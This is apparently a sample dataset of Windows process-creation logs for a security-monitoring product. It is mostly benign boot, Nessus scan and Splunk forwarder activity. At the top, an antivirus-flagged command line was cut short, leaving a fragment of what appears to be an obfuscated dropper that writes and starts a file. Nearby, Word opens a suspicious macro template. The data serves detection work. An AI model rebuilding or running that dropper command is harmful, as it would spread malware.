This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. cho %~i)>"!GSI!" && start "" "!GSI!"we8105desk
1822016-08-24T10:43:17.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1832016-08-24T10:43:17.000-0600wmiadap.exe /R /Twe8105desk
1842016-08-24T10:43:16.000-0600"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"we8105desk
1852016-08-24T10:43:12.000-0600"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "D:\Miranda_Tate_unveiled.dotm"we8105desk
1862016-08-24T10:43:12.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1872016-08-24T10:43:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1882016-08-24T10:43:03.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1892016-08-24T10:43:02.000-0600"C:\Windows\explorer.exe"we8105desk
1902016-08-24T10:42:16.000-0600C:\Windows\system32\AUDIODG.EXE 0x8b8we8105desk
1912016-08-24T10:36:59.000-0600"dwm.exe"we9041srv
1922016-08-24T10:36:59.000-0600"LogonUI.exe" /flags:0x0we9041srv
1932016-08-24T10:36:58.000-0600winlogon.exewe9041srv
1942016-08-24T10:36:58.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we9041srv
1952016-08-24T10:36:58.000-0600\SystemRoot\System32\smss.exe 00000000 00000050we9041srv
1962016-08-24T10:36:44.000-0600choice /T 1 /C X /D X /Nwe8105desk
1972016-08-24T10:36:44.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1982016-08-24T10:36:44.000-0600cmd /c C:\Windows\temp\nessus_W7GLH62C.batwe8105desk
1992016-08-24T10:36:26.000-0600"dwm.exe"we1149srv
2002016-08-24T10:36:25.000-0600"LogonUI.exe" /flags:0x0we1149srv
2012016-08-24T10:36:24.000-0600winlogon.exewe1149srv
2022016-08-24T10:36:24.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we1149srv
2032016-08-24T10:36:24.000-0600\SystemRoot\System32\smss.exe 00000000 00000050we1149srv
2042016-08-24T10:36:14.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2052016-08-24T10:36:14.000-0600C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exewe8105desk
2062016-08-24T10:36:14.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2072016-08-24T10:36:14.000-0600sc start tenable_mw_scan type=1 output=nessus_SFBBT7QA.txtwe8105desk
2082016-08-24T10:36:02.000-0600choice /T 1 /C X /D X /Nwe9041srv
2092016-08-24T10:36:02.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2102016-08-24T10:36:02.000-0600cmd /c C:\Windows\temp\nessus_ZCHPYH15.batwe9041srv
2112016-08-24T10:35:36.000-0600schtasks /query /XMLwe8105desk
2122016-08-24T10:35:36.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2132016-08-24T10:35:36.000-0600cmd /c "schtasks /query /XML > %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP & ren %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP nessus_VPG2T4UF.TXT"we8105desk
2142016-08-24T10:35:32.000-0600C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exewe9041srv
2152016-08-24T10:35:32.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2162016-08-24T10:35:32.000-0600sc start tenable_mw_scan type=1 output=nessus_QYVJLVDT.txtwe9041srv
2172016-08-24T10:35:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
2182016-08-24T10:35:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
2192016-08-24T10:35:08.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2202016-08-24T10:34:56.000-0600netsh advfirewall show allprofiles firewallpolicywe8105desk
2212016-08-24T10:34:56.000-0600cmd /c netsh advfirewall show allprofiles firewallpolicywe8105desk
2222016-08-24T10:34:55.000-0600netsh advfirewall firewall show rule name=all verbosewe8105desk
2232016-08-24T10:34:55.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2242016-08-24T10:34:55.000-0600cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & move %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP %SystemRoot%\TEMP\nessus_OCREA4YZ.TXTwe8105desk
2252016-08-24T10:34:50.000-0600schtasks /query /XMLwe9041srv
2262016-08-24T10:34:50.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2272016-08-24T10:34:50.000-0600cmd /c "schtasks /query /XML > %SystemRoot%\TEMP\nessus_W426FMMY.TMP & ren %SystemRoot%\TEMP\nessus_W426FMMY.TMP nessus_W426FMMY.TXT"we9041srv
2282016-08-24T10:34:21.000-0600tasklist /svcwe8105desk
2292016-08-24T10:34:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2302016-08-24T10:34:21.000-0600cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP & ren %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP nessus_task_listY42QJDIQ.TXT"we8105desk
2312016-08-24T10:34:19.000-0600C:\Windows\system32\svchost.exe -k wsappxwe9041srv
2322016-08-24T10:34:14.000-0600powershell "Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096"we9041srv
2332016-08-24T10:34:14.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2342016-08-24T10:34:14.000-0600cmd /c powershell "Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096" > %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP & move %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP %SystemRoot%\TEMP\nessus_R3OP3JQV.TXTwe9041srv
2352016-08-24T10:34:11.000-0600netsh advfirewall show allprofiles firewallpolicywe9041srv
2362016-08-24T10:34:11.000-0600cmd /c netsh advfirewall show allprofiles firewallpolicywe9041srv
2372016-08-24T10:34:11.000-0600netsh advfirewall firewall show rule name=all verbosewe9041srv
2382016-08-24T10:34:11.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2392016-08-24T10:34:11.000-0600cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & move %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP %SystemRoot%\TEMP\nessus_SV9VMSPT.TXTwe9041srv
2402016-08-24T10:34:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe8105desk
2412016-08-24T10:34:06.000-0600C:\Windows\system32\svchost.exe -k regsvcwe8105desk
2422016-08-24T10:34:05.000-0600netsh wlan show interfacewe8105desk
2432016-08-24T10:34:05.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2442016-08-24T10:34:05.000-0600cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP & move %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP %SystemRoot%\TEMP\nessus_IQK9FYH1.TXTwe8105desk
2452016-08-24T10:34:04.000-0600C:\Windows\servicing\TrustedInstaller.exewe8105desk
2462016-08-24T10:33:53.000-0600netstat -anowe8105desk
2472016-08-24T10:33:53.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2482016-08-24T10:33:53.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2492016-08-24T10:33:53.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe7_ Global\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2502016-08-24T10:33:53.000-0600cmd /c "netstat -ano > %SystemRoot%\TEMP\nessus_4UC962OK.TMP & ren %SystemRoot%\TEMP\nessus_4UC962OK.TMP nessus_4UC962OK.TXT"we8105desk
2512016-08-24T10:33:52.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2522016-08-24T10:33:46.000-0600c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm45a13fae-8ca5-408b-a9e4-631fc0631086 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 -ta 0we1149srv
2532016-08-24T10:33:44.000-0600tasklist /svcwe9041srv
2542016-08-24T10:33:44.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2552016-08-24T10:33:44.000-0600cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP & ren %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP nessus_task_listI8RC8S8K.TXT"we9041srv
2562016-08-24T10:33:32.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2572016-08-24T10:33:30.000-0600netsh wlan show interfacewe9041srv
2582016-08-24T10:33:30.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2592016-08-24T10:33:30.000-0600cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_JMJL39S5.TMP & move %SystemRoot%\TEMP\nessus_JMJL39S5.TMP %SystemRoot%\TEMP\nessus_JMJL39S5.TXTwe9041srv
2602016-08-24T10:33:30.000-0600C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.16384_none_fa1dc1539b4180d8\TiWorker.exe -Embeddingwe9041srv
2612016-08-24T10:33:30.000-0600C:\Windows\servicing\TrustedInstaller.exewe9041srv
2622016-08-24T10:33:24.000-0600C:\Windows\system32\sppsvc.exewe9041srv
2632016-08-24T10:33:22.000-0600netstat -anowe9041srv
2642016-08-24T10:33:22.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2652016-08-24T10:33:22.000-0600cmd /c "netstat -ano > %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP & ren %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP nessus_4LX6EPAV.TXT"we9041srv
2662016-08-24T10:33:21.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe9041srv
2672016-08-24T10:26:02.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2682016-08-24T10:26:02.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe9041srv
2692016-08-24T10:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
2702016-08-24T10:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
2712016-08-24T10:21:04.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2722016-08-24T10:20:25.000-0600C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embeddingwe8105desk
2732016-08-24T10:19:43.000-0600C:\Windows\system32\wermgr.exe -queuereportingwe8105desk
2742016-08-24T10:18:10.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2752016-08-24T10:18:10.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2762016-08-24T10:15:15.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2772016-08-24T10:14:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2782016-08-24T10:12:40.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2792016-08-24T10:12:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2802016-08-24T10:10:24.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2812016-08-24T10:10:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2822016-08-24T10:10:00.000-0600wmiadap.exe /F /T /Rwe8105desk
2832016-08-24T10:09:04.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2842016-08-24T10:08:57.000-0600taskhost.exe $(Arg0)we8105desk
2852016-08-24T10:08:57.000-0600C:\Windows\System32\sdclt.exe /CONFIGNOTIFICATIONwe8105desk
2862016-08-24T10:08:16.000-0600"C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe"we8105desk
2872016-08-24T10:08:16.000-0600C:\Windows\system32\sppsvc.exewe8105desk
2882016-08-24T10:08:16.000-0600"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe"we8105desk
2892016-08-24T10:07:23.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2902016-08-24T10:07:22.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2912016-08-24T10:07:22.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2922016-08-24T10:07:20.000-0600C:\Windows\system32\SearchIndexer.exe /Embeddingwe8105desk
2932016-08-24T10:06:49.000-0600C:\Windows\system32\SearchIndexer.exe /Embeddingwe8105desk
2942016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServiceswe8105desk
2952016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe"we8105desk
2962016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe"we8105desk
2972016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"we8105desk
2982016-08-24T10:06:44.000-0600"C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe"we8105desk
2992016-08-24T10:06:44.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
3002016-08-24T10:06:44.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
3012016-08-24T10:06:44.000-0600C:\Windows\SysWOW64\runonce.exe /Run6432we8105desk
3022016-08-24T10:06:44.000-0600"C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe"we8105desk
3032016-08-24T10:06:44.000-0600"C:\Program Files\Boot Camp\Bootcamp.exe"we8105desk
3042016-08-24T10:06:44.000-0600"C:\Windows\System32\igfxpers.exe"we8105desk
3052016-08-24T10:06:44.000-0600"C:\Windows\System32\hkcmd.exe"we8105desk
3062016-08-24T10:06:44.000-0600"C:\Windows\system32\igfxsrvc.exe" -Embeddingwe8105desk
3072016-08-24T10:06:43.000-0600"C:\Windows\System32\igfxtray.exe"we8105desk
3082016-08-24T10:06:42.000-0600C:\Windows\Explorer.EXEwe8105desk
3092016-08-24T10:06:42.000-0600"C:\Windows\system32\Dwm.exe"we8105desk
3102016-08-24T10:06:42.000-0600C:\Windows\system32\userinit.exewe8105desk
3112016-08-24T10:06:42.000-0600"taskhost.exe"we8105desk
3122016-08-24T10:06:42.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
3132016-08-24T10:06:20.000-0600C:\Windows\System32\svchost.exe -k secsvcswe8105desk
3142016-08-24T10:06:16.000-0600taskhost.exe SYSTEMwe8105desk
3152016-08-24T10:06:15.000-0600"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-ac6024c6-0e8e-4905-9442-280600567282 -SystemEventPortName:HostProcess-47fb5318-ca0f-44a7-866d-cf286eabcb42 -IoCancelEventPortName:HostProcess-73811b94-bc88-4562-beac-f050c8c2e1ab -NonStateChangingEventPortName:HostProcess-487fce22-2fcf-4925-8557-9c32d3729e3e -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:9e02b3ab-0d2b-4e15-8682-744712c1ca2ewe8105desk
3162016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k bthsvcswe8105desk
3172016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonationwe8105desk
3182016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestrictedwe8105desk
3192016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"we8105desk
3202016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"we8105desk
3212016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"we8105desk
3222016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"we8105desk
3232016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"we8105desk
3242016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"we8105desk
3252016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"we8105desk
3262016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"we8105desk
3272016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"we8105desk
3282016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"we8105desk
3292016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1we8105desk
3302016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c btool server list general --no-logwe8105desk
3312016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c btool server list replication_port --no-logwe8105desk
3322016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\E5548D7D-7D5D-4693-A892-94129A925C26.vbswe8105desk
3332016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\A1985133-B0BB-4771-9B34-54C1DC493370.vbswe8105desk
3342016-08-24T10:06:03.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3352016-08-24T10:06:03.000-0600C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3362016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\5F336C48-BD3F-46AF-8FB1-E076BA7329CB.vbswe8105desk
3372016-08-24T10:06:01.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1we8105desk
3382016-08-24T10:06:01.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe8105desk
3392016-08-24T10:06:01.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3402016-08-24T10:06:01.000-0600C:\Windows\system32\cmd.exe /c btool server list kvstore --no-logwe8105desk
3412016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c btool server list general --no-logwe8105desk
3422016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c btool web list settings --no-logwe8105desk
3432016-08-24T10:06:00.000-0600C:\Windows\Sysmon.exewe8105desk
3442016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argswe8105desk
3452016-08-24T10:06:00.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
3462016-08-24T10:06:00.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
3472016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarswe8105desk
3482016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe"we8105desk
3492016-08-24T10:06:00.000-0600C:\Windows\system32\AppleTimeSrv.exewe8105desk
3502016-08-24T10:06:00.000-0600C:\Windows\system32\AppleOSSMgr.exewe8105desk
3512016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe"we8105desk
3522016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe"we8105desk
3532016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkwe8105desk
3542016-08-24T10:06:00.000-0600C:\Windows\System32\spoolsv.exewe8105desk
3552016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k NetworkServicewe8105desk
3562016-08-24T10:06:00.000-0600"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-fa915abb-3e19-454d-abc3-af7084ddd6b2 -SystemEventPortName:HostProcess-ac8be148-87a6-4e0c-9c46-e06e1597f0ce -IoCancelEventPortName:HostProcess-c6ad7e19-54f2-46ea-af3f-88f7621e76ea -NonStateChangingEventPortName:HostProcess-b15c724e-59d6-4e9e-bba1-99864b9d80ce -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:584cb968-8b77-45ad-ae19-bbeb66853bc0we8105desk
3572016-08-24T10:06:00.000-0600"LogonUI.exe" /flags:0x0we8105desk
3582016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k LocalServicewe8105desk
3592016-08-24T10:06:00.000-0600winlogon.exewe8105desk
3602016-08-24T10:06:00.000-0600C:\Windows\system32\AUDIODG.EXE 0x2c8we8105desk
3612016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k netsvcswe8105desk
3622016-08-24T10:06:00.000-0600C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestrictedwe8105desk
3632016-08-24T10:06:00.000-0600C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestrictedwe8105desk
3642016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k RPCSSwe8105desk
3652016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k DcomLaunchwe8105desk
3662016-08-24T10:06:00.000-0600C:\Windows\system32\lsm.exewe8105desk
3672016-08-24T10:06:00.000-0600C:\Windows\system32\lsass.exewe8105desk
3682016-08-24T10:06:00.000-0600C:\Windows\system32\services.exewe8105desk
3692016-08-24T10:06:00.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we8105desk
3702016-08-24T10:06:00.000-0600wininit.exewe8105desk
3712016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exe 00000001 00000048we8105desk
3722016-08-24T10:06:00.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we8105desk
3732016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exe 00000000 00000048we8105desk
3742016-08-24T10:06:00.000-0600\??\C:\Windows\system32\autochk.exe *we8105desk
3752016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exewe8105desk
3762016-08-24T09:44:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
3772016-08-24T09:44:54.000-0600C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embeddingwe8105desk
3782016-08-24T09:44:51.000-0600C:\Windows\system32\vssvc.exewe8105desk
3792016-08-24T09:44:50.000-0600"C:\Program Files (x86)\Common Files\Acronis\VssRequestor64\vss_requestor.exe" -Embeddingwe8105desk
3802016-08-24T09:39:33.000-0600C:\Windows\system32\wermgr.exe -queuereportingwe8105desk